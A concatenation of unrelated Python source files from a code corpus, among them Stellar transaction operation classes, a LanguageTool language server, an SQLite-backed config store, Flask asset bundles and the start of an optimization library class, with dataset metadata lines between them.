        pad_length = 4 - length if length <= 4 else 12 - length
        # asset_code = self.asset_code + '\x00' * pad_length
        # asset_code = bytearray(asset_code, encoding='utf-8')
        asset_code = bytearray(self.asset_code, 'ascii') + b'\x00' * pad_length
        asset = Xdr.nullclass()
        if len(asset_code) == 4:
            asset.type = Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM4
            asset.assetCode4 = asset_code
        else:
            asset.type = Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM12
            asset.assetCode12 = asset_code
        allow_trust_op = Xdr.types.AllowTrustOp(trustor, asset, self.authorize)
        self.body.type = Xdr.const.ALLOW_TRUST
        self.body.allowTrustOp = allow_trust_op
        return super(AllowTrust, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild an AllowTrust from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        trustor = encode_check('account', op_xdr_object.body.allowTrustOp.trustor.ed25519).decode()
        authorize = op_xdr_object.body.allowTrustOp.authorize
        asset_type = op_xdr_object.body.allowTrustOp.asset.type
        if asset_type == Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM4:
            asset_code = op_xdr_object.body.allowTrustOp.asset.assetCode4.decode()
        elif asset_type == Xdr.const.ASSET_TYPE_CREDIT_ALPHANUM12:
            asset_code = op_xdr_object.body.allowTrustOp.asset.assetCode12.decode()
        else:
            raise Exception
        return cls({
            'source': source,
            'trustor': trustor,
            'authorize': authorize,
            'asset_code': asset_code
        })
class SetOptions(Operation):
    """Sets account options: inflation destination, account flags,
    thresholds, master key weight, home domain, and optionally one
    additional signer.
    """
    def __init__(self, opts):
        super(SetOptions, self).__init__(opts)
        self.inflation_dest = opts.get('inflation_dest')
        self.clear_flags = opts.get('clear_flags')
        self.set_flags = opts.get('set_flags')
        self.master_weight = opts.get('master_weight')
        self.low_threshold = opts.get('low_threshold')
        self.med_threshold = opts.get('med_threshold')
        self.high_threshold = opts.get('high_threshold')
        self.home_domain = opts.get('home_domain')
        self.signer_address = opts.get('signer_address')
        self.signer_type = opts.get('signer_type')
        self.signer_weight = opts.get('signer_weight')
        # When only an address is supplied, it must be a valid strkey
        # account id and the type defaults to ed25519PublicKey.
        if self.signer_address is not None and self.signer_type is None:
            try:
                decode_check('account', self.signer_address)
            except DecodeError:
                raise Exception('must be a valid strkey if not give signer_type')
            self.signer_type = 'ed25519PublicKey'
        if self.signer_type in ('hashX', 'preAuthTx') and \
                (self.signer_address is None or len(self.signer_address) != 32):
            raise Exception('hashX or preAuthTx Signer must be 32 bytes')
        if self.signer_type is not None and self.signer_type not in ('ed25519PublicKey', 'hashX', 'preAuthTx'):
            raise Exception('invalid signer type.')
    def to_xdr_object(self):
        """Serialize this operation into its XDR representation.

        Optional scalar fields are wrapped in 0- or 1-element lists because
        that is how the XDR layer encodes optional values.
        """
        def assert_option_array(x):
            if x is None:
                return []
            if not isinstance(x, list):
                return [x]
            return x
        if self.inflation_dest is not None:
            inflation_dest = [account_xdr_object(self.inflation_dest)]
        else:
            inflation_dest = []
        self.clear_flags = assert_option_array(self.clear_flags)
        self.set_flags = assert_option_array(self.set_flags)
        self.master_weight = assert_option_array(self.master_weight)
        self.low_threshold = assert_option_array(self.low_threshold)
        self.med_threshold = assert_option_array(self.med_threshold)
        self.high_threshold = assert_option_array(self.high_threshold)
        self.home_domain = assert_option_array(self.home_domain)
        if self.signer_address is not None and \
                self.signer_type is not None and \
                self.signer_weight is not None:
            signer = [
                Xdr.types.Signer(signer_key_xdr_object(self.signer_type, self.signer_address), self.signer_weight)]
        else:
            signer = []
        set_options_op = Xdr.types.SetOptionsOp(inflation_dest, self.clear_flags, self.set_flags,
                                                self.master_weight, self.low_threshold, self.med_threshold,
                                                self.high_threshold, self.home_domain, signer)
        self.body.type = Xdr.const.SET_OPTIONS
        self.body.setOptionsOp = set_options_op
        return super(SetOptions, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a SetOptions from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        if not op_xdr_object.body.setOptionsOp.inflationDest:
            inflation_dest = None
        else:
            inflation_dest = encode_check('account', op_xdr_object.body.setOptionsOp.inflationDest[0].ed25519).decode()
        clear_flags = op_xdr_object.body.setOptionsOp.clearFlags  # list
        set_flags = op_xdr_object.body.setOptionsOp.setFlags
        master_weight = op_xdr_object.body.setOptionsOp.masterWeight
        low_threshold = op_xdr_object.body.setOptionsOp.lowThreshold
        med_threshold = op_xdr_object.body.setOptionsOp.medThreshold
        high_threshold = op_xdr_object.body.setOptionsOp.highThreshold
        home_domain = op_xdr_object.body.setOptionsOp.homeDomain
        if op_xdr_object.body.setOptionsOp.signer:
            key = op_xdr_object.body.setOptionsOp.signer[0].key
            if key.type == Xdr.const.SIGNER_KEY_TYPE_ED25519:
                signer_address = encode_check('account', key.ed25519).decode()
                signer_type = 'ed25519PublicKey'
            if key.type == Xdr.const.SIGNER_KEY_TYPE_PRE_AUTH_TX:
                signer_address = key.preAuthTx
                signer_type = 'preAuthTx'
            if key.type == Xdr.const.SIGNER_KEY_TYPE_HASH_X:
                signer_address = key.hashX
                signer_type = 'hashX'
            signer_weight = op_xdr_object.body.setOptionsOp.signer[0].weight
        else:
            signer_address = None
            signer_type = None
            signer_weight = None
        return cls({
            'source': source,
            'inflation_dest': inflation_dest,
            'clear_flags': clear_flags,
            'set_flags': set_flags,
            'master_weight': master_weight,
            'low_threshold': low_threshold,
            'med_threshold': med_threshold,
            'high_threshold': high_threshold,
            'home_domain': home_domain,
            'signer_address': signer_address,
            # Fixed key: was 'Signer_type', which __init__ never reads, so a
            # decoded signer type was silently dropped on round-trip.
            'signer_type': signer_type,
            'signer_weight': signer_weight
        })
class ManageOffer(Operation):
    """Creates, updates, or deletes an offer on the distributed exchange.

    An ``offer_id`` of 0 (the default) creates a new offer; a non-zero id
    updates or deletes the existing offer with that id.
    """
    def __init__(self, opts):
        super(ManageOffer, self).__init__(opts)
        self.selling = opts.get('selling')  # Asset
        self.buying = opts.get('buying')  # Asset
        self.amount = opts.get('amount')
        self.price = opts.get('price')
        self.offer_id = opts.get('offer_id', 0)
    def to_xdr_object(self):
        """Serialize this operation into its XDR representation.

        The price is converted to its best rational approximation n/d,
        as XDR stores prices as integer fractions.
        """
        selling = self.selling.to_xdr_object()
        buying = self.buying.to_xdr_object()
        price = best_r(self.price)
        price = Xdr.types.Price(price['n'], price['d'])
        amount = Operation.to_xdr_amount(self.amount)
        manage_offer_op = Xdr.types.ManageOfferOp(selling, buying, amount, price, self.offer_id)
        self.body.type = Xdr.const.MANAGE_OFFER
        self.body.manageOfferOp = manage_offer_op
        return super(ManageOffer, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a ManageOffer from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        selling = Asset.from_xdr_object(op_xdr_object.body.manageOfferOp.selling)
        buying = Asset.from_xdr_object(op_xdr_object.body.manageOfferOp.buying)
        amount = Operation.from_xdr_amount(op_xdr_object.body.manageOfferOp.amount)
        # Reconstruct the decimal price from the stored fraction n/d.
        n = op_xdr_object.body.manageOfferOp.price.n
        d = op_xdr_object.body.manageOfferOp.price.d
        price = division(n, d)
        offer_id = op_xdr_object.body.manageOfferOp.offerID
        return cls({
            'source': source,
            'selling': selling,
            'buying': buying,
            'amount': amount,
            'price': price,
            'offer_id': offer_id
        })
class CreatePassiveOffer(Operation):
    """Creates a passive offer: one that does not cross an existing offer
    at the same price. Unlike ManageOffer it carries no offer id.
    """
    def __init__(self, opts):
        super(CreatePassiveOffer, self).__init__(opts)
        self.selling = opts.get('selling')
        self.buying = opts.get('buying')
        self.amount = opts.get('amount')
        self.price = opts.get('price')
    def to_xdr_object(self):
        """Serialize this operation into its XDR representation."""
        selling = self.selling.to_xdr_object()
        buying = self.buying.to_xdr_object()
        # XDR stores prices as integer fractions; find the best n/d.
        price = best_r(self.price)
        price = Xdr.types.Price(price['n'], price['d'])
        amount = Operation.to_xdr_amount(self.amount)
        create_passive_offer_op = Xdr.types.CreatePassiveOfferOp(selling, buying, amount, price)
        self.body.type = Xdr.const.CREATE_PASSIVE_OFFER
        self.body.createPassiveOfferOp = create_passive_offer_op
        return super(CreatePassiveOffer, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a CreatePassiveOffer from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        selling = Asset.from_xdr_object(op_xdr_object.body.createPassiveOfferOp.selling)
        buying = Asset.from_xdr_object(op_xdr_object.body.createPassiveOfferOp.buying)
        amount = Operation.from_xdr_amount(op_xdr_object.body.createPassiveOfferOp.amount)
        n = op_xdr_object.body.createPassiveOfferOp.price.n
        d = op_xdr_object.body.createPassiveOfferOp.price.d
        price = division(n, d)
        return cls({
            'source': source,
            'selling': selling,
            'buying': buying,
            'amount': amount,
            'price': price
        })
class AccountMerge(Operation):
    """Merges the source account into ``destination``, transferring its
    remaining balance to the destination account.
    """
    def __init__(self, opts):
        super(AccountMerge, self).__init__(opts)
        self.destination = opts.get('destination')
    def to_xdr_object(self):
        """Serialize to XDR; the operation body is just the destination."""
        self.body.type = Xdr.const.ACCOUNT_MERGE
        self.body.destination = account_xdr_object(self.destination)
        return super(AccountMerge, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild an AccountMerge from its XDR object form."""
        source_account = op_xdr_object.sourceAccount
        if source_account:
            source = encode_check('account', source_account[0].ed25519).decode()
        else:
            source = None
        destination = encode_check('account', op_xdr_object.body.destination.ed25519).decode()
        return cls({'source': source, 'destination': destination})
class Inflation(Operation):
    """The inflation operation; it carries no fields of its own."""
    def __init__(self, opts):
        super(Inflation, self).__init__(opts)
    def to_xdr_object(self):
        """Serialize to XDR; only the operation type needs to be set."""
        self.body.type = Xdr.const.INFLATION
        return super(Inflation, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild an Inflation op; only the optional source account matters."""
        account = op_xdr_object.sourceAccount
        if account:
            source = encode_check('account', account[0].ed25519).decode()
        else:
            source = None
        return cls({'source': source})
class ManageData(Operation):
    """Sets, modifies, or deletes a key/value data entry on an account.

    A ``data_value`` of None deletes the entry named ``data_name``.
    """
    def __init__(self, opts):
        super(ManageData, self).__init__(opts)
        self.data_name = opts.get('data_name')
        self.data_value = opts.get('data_value')
        # The limit is 64 *bytes*, so measure the UTF-8 encoded length:
        # the old character-count check let multi-byte names/values slip
        # through (e.g. 40 three-byte characters = 120 bytes).
        name_too_long = len(bytearray(self.data_name, 'utf-8')) > 64
        value_too_long = (self.data_value is not None
                          and len(bytearray(self.data_value, 'utf-8')) > 64)
        if name_too_long or value_too_long:
            raise XdrLengthError("Data or value should be <= 64 bytes (ascii encoded). ")
    def to_xdr_object(self):
        """Serialize this operation; a missing value becomes an empty
        optional (encoded as an empty list) in XDR."""
        data_name = bytearray(self.data_name, encoding='utf-8')
        if self.data_value is not None:
            data_value = [bytearray(self.data_value, 'utf-8')]
        else:
            data_value = []
        manage_data_op = Xdr.types.ManageDataOp(data_name, data_value)
        self.body.type = Xdr.const.MANAGE_DATA
        self.body.manageDataOp = manage_data_op
        return super(ManageData, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a ManageData from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        data_name = op_xdr_object.body.manageDataOp.dataName.decode()
        if op_xdr_object.body.manageDataOp.dataValue:
            data_value = op_xdr_object.body.manageDataOp.dataValue[0].decode()
        else:
            data_value = None
        return cls({
            'source': source,
            'data_name': data_name,
            'data_value': data_value
        })
| 2.203125 | 2 |
PSet3/MIT_6.00.1x_PSet3_P2_Andrey_Tymofeiuk.py | atymofeiuk/MIT_6.00.1x_Andrey_Tymofeiuk | 0 | 12761515 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 15 13:58:31 2017
MIT 6.00.1x course on edX.org: PSet3 P2
Next, implement the function getGuessedWord that takes in two parameters
- a string, secretWord, and a list of letters, lettersGuessed. This function
returns a string that is comprised of letters and underscores, based on what
letters in lettersGuessed are in secretWord. This shouldn't be too different
from isWordGuessed!
@author: <NAME>
Important: This code is placed at GitHub to track my progress in programming and
to show my way of thinking. Also I will be happy if somebody will find my solution
interesting. But I respect The Honor Code and I ask you to respect it also - please
don't use this solution to pass the MIT 6.00.1x course.
"""
def getGuessedWord(secretWord, lettersGuessed):
    '''
    secretWord: string, the word the user is guessing
    lettersGuessed: list, what letters have been guessed so far
    returns: string, comprised of letters and underscores that represents
      what letters in secretWord have been guessed so far.
    '''
    # Reveal each guessed letter; hide the rest behind " _".
    revealed = [letter if letter in lettersGuessed else " _"
                for letter in secretWord]
    return "".join(revealed)
| 3.90625 | 4 |
anviz_sync/__init__.py | sergiocorato/anviz-sync | 11 | 12761516 | """
anviz_sync
~~~~~~~~~~
Sync Anviz Time & Attendance data with specified database.
:copyright: (c) 2014 by <NAME>
:license: BSD, see LICENSE for more details.
"""
__version__ = '0.1.0'
| 1.0625 | 1 |
ltls_server.py | dpriedel/languagetool_languageserver | 1 | 12761517 | <reponame>dpriedel/languagetool_languageserver
#!/usr/bin/python
############################################################################
# #
# Licensed under the Apache License, Version 2.0 (the "License") #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http: // www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import argparse
import logging
import sys
import os
import asyncio
import json
import subprocess
import urllib3
import time
from urllib.parse import urlparse
from pygls.lsp.methods import (TEXT_DOCUMENT_DID_SAVE,
TEXT_DOCUMENT_DID_CLOSE, TEXT_DOCUMENT_DID_OPEN)
from pygls.lsp.types import (ConfigurationItem, ConfigurationParams, Diagnostic,
DiagnosticSeverity, TextDocumentSaveRegistrationOptions,
DidSaveTextDocumentParams,
DidCloseTextDocumentParams, DidOpenTextDocumentParams,
MessageType, Position, Range, Registration,
RegistrationParams, Unregistration,
UnregistrationParams)
from pygls.server import LanguageServer
logging.basicConfig(filename="/tmp/pyltls.log", level=logging.INFO, filemode="w")
def _find_line_ends(content: str):
results: list[int] = []
loc: int = content.find('\n')
while loc > -1:
results.append(loc)
loc = content.find('\n', loc + 1)
return results
def _convert_offset_to_line_col(offsets: list[int], offset: int) -> tuple[int, int]:
""" just as it says, translate a zero-based offset to a line and column."""
line: int = 0
col: int = 0
try:
while offsets[line] < offset:
line += 1
except IndexError as e:
pass
col = offset - offsets[line - 1] if line > 0 else offset + 1
return(line, col - 1)
class LanguageToolLanguageServer(LanguageServer):
    """Language server that proxies text checks to a locally spawned
    LanguageTool HTTP server.
    """
    CONFIGURATION_SECTION = 'ltlsServer'
    def __init__(self):
        super().__init__()
        # Handle to the spawned LanguageTool subprocess (None until started).
        self.languagetool_: subprocess.Popen = None
        self.language_: str = None
        self.port_: str = None
        self.http_ = urllib3.PoolManager()
    def __del__(self):
        # Guard: StartLanguageTool may never have been called, in which
        # case languagetool_ is still None and kill() would crash.
        if self.languagetool_ is not None:
            self.languagetool_.kill()
            outs, errs = self.languagetool_.communicate()
    def StartLanguageTool(self, args):
        """Spawn the LanguageTool HTTP server from the parsed CLI *args*."""
        try:
            # we need to capture stdout, stderr because the languagetool server
            # emits several messages and we don't want them to go to the LSP client.
            self.language_ = args.language_
            self.port_ = args.port_
            command_and_args: list[str] = [args.command_, "--http"]
            # args.port_ is a string, so compare against the string default.
            # (The old `!= 8081` int comparison was always true.)
            if args.port_ != "8081":
                command_and_args.append("-p")
                command_and_args.append(args.port_)
            if args.languageModel_:
                command_and_args.append("--languageModel")
                command_and_args.append(args.languageModel_)
            if args.word2vecModel_:
                command_and_args.append("--word2vecModel")
                command_and_args.append(args.word2vecModel_)
            self.languagetool_ = subprocess.Popen(command_and_args,
                                                  stdin=subprocess.PIPE,
                                                  stdout=subprocess.PIPE,
                                                  stderr=subprocess.PIPE
                                                  )
            time.sleep(2.0)  # we need to give some time for the server to start.
        except Exception as e:
            self.show_message('Error ocurred: {}'.format(e))
        self.start_io()
ltls_server = LanguageToolLanguageServer()
def _publish_diagnostics(server: LanguageToolLanguageServer, uri: str, doc_content: str, results: dict):
    """Helper function to publish diagnostics for a file.
    results is already in json format from requests library."""
    # Newline positions are needed to map LanguageTool's flat character
    # offsets onto LSP's zero-based (line, character) positions.
    offsets = _find_line_ends(doc_content)
    diagnostics = []
    for error in results["matches"]:
        offset = int(error["offset"])
        line, col = _convert_offset_to_line_col(offsets, offset)
        d = Diagnostic(
            range=Range(
                start=Position(line=line, character=col),
                # The match spans error["length"] characters on the same line.
                end=Position(line=line, character=col + int(error["length"]))
            ),
            # Include the rule id so the user can look up / disable the rule.
            message=error["message"] + ' ' + error["rule"]["id"],
            severity=DiagnosticSeverity.Error,
            source="ltls"
        )
        diagnostics.append(d)
    server.publish_diagnostics(uri, diagnostics)
# TEXT_DOCUMENT_DID_SAVE
@ltls_server.feature(TEXT_DOCUMENT_DID_SAVE, TextDocumentSaveRegistrationOptions(includeText=True))
async def did_save(server: LanguageToolLanguageServer, params: DidSaveTextDocumentParams):
    """Actions run on textDocument/didSave: re-check the saved document
    with LanguageTool and publish the resulting diagnostics."""
    # when we registered this function we told the client that we want
    # the text when the file is saved. If we don't get it we'll fall
    # back to reading the file.
    doc_content: str = ""
    if params.text:
        doc_content = params.text
    else:
        fname = urlparse(params.text_document.uri, scheme="file")
        with open(fname.path, mode='r', encoding='utf-8') as saved_file:
            doc_content = saved_file.read()
    # Query the local LanguageTool HTTP API with the full document text.
    payload = {'language': server.language_, 'text': doc_content}
    url = 'http://localhost:' + server.port_ + '/v2/check'
    try:
        req = server.http_.request('GET', url, fields=payload, retries=urllib3.Retry(connect=5, backoff_factor=0.3))
        _publish_diagnostics(server, params.text_document.uri, doc_content, json.loads(req.data.decode('utf-8')))
    except Exception as e:
        server.show_message('Error ocurred: {}'.format(e))
# TEXT_DOCUMENT_DID_OPEN
@ltls_server.feature(TEXT_DOCUMENT_DID_OPEN)
async def did_open(server: LanguageToolLanguageServer, params: DidOpenTextDocumentParams):
    """Actions run on textDocument/didOpen: check the freshly opened
    document with LanguageTool and publish diagnostics."""
    # didOpen always carries the document text, so no file fallback is needed.
    doc_content = params.text_document.text
    payload = {'language': server.language_, 'text': doc_content}
    url = 'http://localhost:' + server.port_ + '/v2/check'
    try:
        req = server.http_.request('GET', url, fields=payload, retries=urllib3.Retry(connect=5, backoff_factor=0.3))
        _publish_diagnostics(server, params.text_document.uri, doc_content, json.loads(req.data.decode('utf-8')))
    except Exception as e:
        server.show_message('Error ocurred: {}'.format(e))
def add_arguments(parser):
    """Register the command-line options understood by the server.

    All destinations use a trailing underscore (``language_`` etc.) to
    match the attribute names read by ``StartLanguageTool``.
    """
    parser.description = "LanguageTool language http server on local host."
    parser.add_argument(
        "-l",
        "--language",
        type=str,
        dest="language_",
        default="en",
        help="Which language to use. Default is 'en'. Use 'en-US' for spell checking.",
    )
    parser.add_argument(
        "-c",
        "--command",
        type=str,
        dest="command_",
        default="/usr/bin/languagetool",
        help="command to run language tool. Default is '/usr/bin/languagetool'.",
    )
    parser.add_argument(
        "--languageModel",
        type=str,
        dest="languageModel_",
        default="",
        help="Optional directory containing 'n-grams'.",
    )
    parser.add_argument(
        "--word2vecModel",
        type=str,
        dest="word2vecModel_",
        default="",
        help="Optional directory containing word2vec neural net data.",
    )
    parser.add_argument(
        "-p",
        "--port",
        type=str,
        dest="port_",
        default="8081",
        help="Use this port for LanguageTool. Default is 8081. ",
    )
def main():
    """Entry point: parse the command line and launch the language server."""
    parser = argparse.ArgumentParser()
    add_arguments(parser)
    cli_args = parser.parse_args()
    ltls_server.StartLanguageTool(cli_args)


if __name__ == '__main__':
    main()
| 1.539063 | 2 |
third_party/antlr_grammars_v4/python/tiny-python/tiny-grammar-without-actions/test_auto_trailing_NEWLINE_2.py | mikhan808/rsyntaxtextarea-antlr4-extension | 2 | 12761518 | if i == 0:
i = 1 # there is no NEWLINE at the end of the code | 2.171875 | 2 |
database.py | klowe0100/botamusique | 0 | 12761519 | import sqlite3
class DatabaseError(Exception):
    """Raised when a requested configuration item cannot be found."""
class Database:
    """Tiny (section, option) -> value store backed by SQLite.

    The API loosely mirrors configparser: get/getboolean/getfloat/getint,
    set, has_option, remove_option, remove_section and items. Each call
    opens a short-lived connection, so instances are cheap to share.
    """
    def __init__(self, db_path):
        self.db_path = db_path
        # connect
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        # check if table exists, or create one
        tables = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='botamusique';").fetchall()
        if len(tables) == 0:
            cursor.execute("CREATE TABLE botamusique (section text, option text, value text, UNIQUE(section, option))")
            conn.commit()
        conn.close()
    def get(self, section, option, **kwargs):
        """Return the stored value; if absent, return ``fallback`` when
        given, otherwise raise DatabaseError."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        result = cursor.execute("SELECT value FROM botamusique WHERE section=? AND option=?", (section, option)).fetchall()
        conn.close()
        if len(result) > 0:
            return result[0][0]
        if 'fallback' in kwargs:
            return kwargs['fallback']
        raise DatabaseError("Item not found")
    def getboolean(self, section, option, **kwargs):
        """Return the value interpreted as a boolean ('0'/'1' strings)."""
        return bool(int(self.get(section, option, **kwargs)))
    def getfloat(self, section, option, **kwargs):
        """Return the value converted to float."""
        return float(self.get(section, option, **kwargs))
    def getint(self, section, option, **kwargs):
        """Return the value converted to int."""
        return int(self.get(section, option, **kwargs))
    def set(self, section, option, value):
        """Insert or overwrite the value for (section, option)."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('''
            INSERT OR REPLACE INTO botamusique (section, option, value)
            VALUES (?, ?, ?)
        ''', (section, option, value))
        conn.commit()
        conn.close()
    def has_option(self, section, option):
        """Return True if (section, option) exists."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        result = cursor.execute("SELECT value FROM botamusique WHERE section=? AND option=?", (section, option)).fetchall()
        conn.close()
        return len(result) > 0
    def remove_option(self, section, option):
        """Delete a single (section, option) entry if present."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute("DELETE FROM botamusique WHERE section=? AND option=?", (section, option))
        conn.commit()
        conn.close()
    def remove_section(self, section):
        """Delete every entry in *section*."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute("DELETE FROM botamusique WHERE section=?", (section, ))
        conn.commit()
        conn.close()
    def items(self, section):
        """Return an iterable of (option, value) pairs for *section*."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        results = cursor.execute("SELECT option, value FROM botamusique WHERE section=?", (section, )).fetchall()
        conn.close()
        return map(lambda v: (v[0], v[1]), results)
    def drop_table(self):
        """Drop the backing table entirely."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute("DROP TABLE botamusique")
        # Commit was missing: without it the implicit transaction is rolled
        # back when the connection closes and the table survives the drop.
        conn.commit()
        conn.close()
| 3.359375 | 3 |
app/assets.py | edtechhub/adaptdev | 0 | 12761520 | from flask_assets import Bundle, Environment
# Asset bundle definitions. The SCSS bundle is compiled once and then fed
# into either a plain or minified CSS bundle; JS bundles are minified.
scss_styles = Bundle(  # pylint: disable=invalid-name
    'src/app/scss/styles.scss',
    filters='libsass',
    depends='**/*.scss',
    output='build/css/styles.css',
)
# Development CSS: autoprefixed but not minified.
css_styles = Bundle(  # pylint: disable=invalid-name
    scss_styles,
    filters='autoprefixer6',
    output='dist/css/styles.css',
)
# Production CSS: autoprefixed and minified.
css_min_styles = Bundle(  # pylint: disable=invalid-name
    scss_styles,
    filters='autoprefixer6,cleancss',
    output='dist/css/styles.min.css',
)
common_js = Bundle(  # pylint: disable=invalid-name
    'src/vendor/jquery/jquery.min.js',
    'src/vendor/popper.js/popper.min.js',
    'src/vendor/bootstrap/index.js',
    'src/vendor/bootstrap/util.js',
    'src/vendor/bootstrap/collapse.js',  # For navbar.
    'src/vendor/bootstrap/alert.js',
    'src/vendor/bootstrap/button.js',
    'src/vendor/bootstrap/dropdown.js',
    'src/vendor/bootstrap/modal.js',
    'src/vendor/bootstrap/tab.js',
    filters='jsmin',
    output='dist/js/common.min.js',
)
search_js = Bundle(  # pylint: disable=invalid-name
    'kerko/kerko/js/search.js',
    filters='jsmin',
    output='dist/js/search.min.js',
)
item_js = Bundle(  # pylint: disable=invalid-name
    'kerko/kerko/js/item.js',
    filters='jsmin',
    output='dist/js/item.min.js',
)
print_js = Bundle(  # pylint: disable=invalid-name
    'kerko/kerko/js/print.js',
    filters='jsmin',
    output='dist/js/print.min.js',
)
class EnvironmentWithBundles(Environment):
    """
    An assets environment that registers its own bundles.

    Registering the bundles at `init_app` time lets it refer to the app config.
    """
    def init_app(self, app):
        super().init_app(app)
        # Serve unminified CSS while debugging assets, minified otherwise.
        if app.config['ASSETS_DEBUG']:
            style_bundle = css_styles
        else:
            style_bundle = css_min_styles
        assets.register('css_styles', style_bundle)
        for bundle_name, bundle in (('common_js', common_js),
                                    ('search_js', search_js),
                                    ('item_js', item_js),
                                    ('print_js', print_js)):
            assets.register(bundle_name, bundle)


assets = EnvironmentWithBundles()  # pylint: disable=invalid-name
| 1.695313 | 2 |
src/brewlog/tasting/forms.py | zgoda/brewlog | 3 | 12761521 | <filename>src/brewlog/tasting/forms.py
from flask_babel import lazy_gettext as _
from flask_login import current_user
from wtforms.fields import TextAreaField
from wtforms.fields.html5 import DateField
from wtforms.validators import InputRequired
from ..forms.base import BaseObjectForm
from ..models import TastingNote
class TastingNoteForm(BaseObjectForm):
    # Both fields are required; the note's author comes from the session.
    date = DateField(_('date'), validators=[InputRequired()])
    text = TextAreaField(_('text'), validators=[InputRequired()])
    def save(self, brew, save=True):
        """Create a TastingNote for *brew* authored by the current user."""
        obj = TastingNote(brew=brew, author=current_user)
        return super(TastingNoteForm, self).save(obj, save)
| 2.25 | 2 |
grAdapt/models/Asynchronous.py | mkduong-ai/grAdapt | 25 | 12761522 | # Python Standard Libraries
import warnings
import time
import os
import sys
from pathlib import Path
# Third party imports
# fancy prints
import numpy as np
from tqdm import tqdm
# grAdapt package
import grAdapt.utils.math
import grAdapt.utils.misc
import grAdapt.utils.sampling
from grAdapt import surrogate as sur, optimizer as opt, escape as esc
from grAdapt.space.transformer import Transformer
from grAdapt.sampling import initializer as init, equidistributed as equi
class Asynchronous:
    """Ask/tell interface for sequential model-based optimization.

    The caller alternates ``ask()`` (get the next point to evaluate) and
    ``tell(x, f)`` (report the function value), while the surrogate model,
    optimizer and escape strategy drive the search.
    """
    def __init__(self, bounds, surrogate=None, optimizer=None, sampling_method=None,
                 escape=None, training=None, random_state=1,
                 n_evals='auto', eps=1e-3, f_min=-np.inf, f_min_eps=1e-2, n_random_starts='auto',
                 auto_checkpoint=False, show_progressbar=True, prints=True):
        """
        Parameters
        ----------
        bounds : list
            list of tuples e.g. [(-5, 5), (-5, 5)]
        surrogate : grAdapt Surrogate object
        optimizer : grAdapt Optimizer object
        sampling_method : Sampling Method to be used. static method from utils
        escape : grAdapt Escape object
        training : (X, y) with X shape (n, m) and y shape (n,)
        random_state : integer
            random_state integer sets numpy seed
        """
        self.bounds = bounds
        # seed
        self.random_state = random_state
        np.random.seed(self.random_state)
        # Fall back to default components when none are supplied; the
        # optimizer and escape strategy must share the surrogate instance.
        if surrogate is None:
            self.surrogate = sur.GPRSlidingWindow()
        else:
            self.surrogate = surrogate
        if optimizer is None:
            self.optimizer = opt.AMSGradBisection(surrogate=self.surrogate)
        else:
            self.optimizer = optimizer
            if surrogate is None:
                raise Exception('If optimizer is passed, then surrogate must be passed, too.')
        if sampling_method is None:
            self.sampling_method = equi.MaximalMinDistance()
        else:
            self.sampling_method = sampling_method
        if escape is None:
            self.escape = esc.NormalDistributionDecay(surrogate=self.surrogate, sampling_method=self.sampling_method)
        else:
            self.escape = escape
            if surrogate is None or sampling_method is None:
                raise Exception('When passing an escape function, surrogate and sampling_method must be passed, too.')
        # other settings
        # continue optimizing from supplied training data if given
        self.training = training
        if training is not None:
            self.X = list(training[0])
            self.y = list(training[1])
            if len(self.X) != len(self.y):
                raise AssertionError('Training data not valid. Length of X and y must be the same.')
        else:
            # Seed the search with points sampled inside the bounds.
            self.X = list(grAdapt.utils.sampling.sample_points_bounds(self.bounds, 11))
            self.y = []
        self.n_evals = n_evals
        self.eps = eps
        self.f_min = f_min
        self.f_min_eps = f_min_eps
        self.n_random_starts = n_random_starts
        # keep track of checkpoint files
        self.checkpoint_file = None
        self.auto_checkpoint = auto_checkpoint
        # results
        self.res = None
        self.show_progressbar = show_progressbar
        self.prints = prints
        # save current iteration
        if training is not None:
            self.iteration = len(self.X) - 1
        else:
            self.iteration = 0
    def escape_x_criteria(self, x_train, iteration):
        """Checks whether new point is different than the latest point by the euclidean distance
        Checks whether new point is inside the defined search space/bounds.
        Returns True if one of the conditions above are fulfilled.

        Parameters
        ----------
        x_train : ndarray (n, d)
        iteration : integer

        Returns
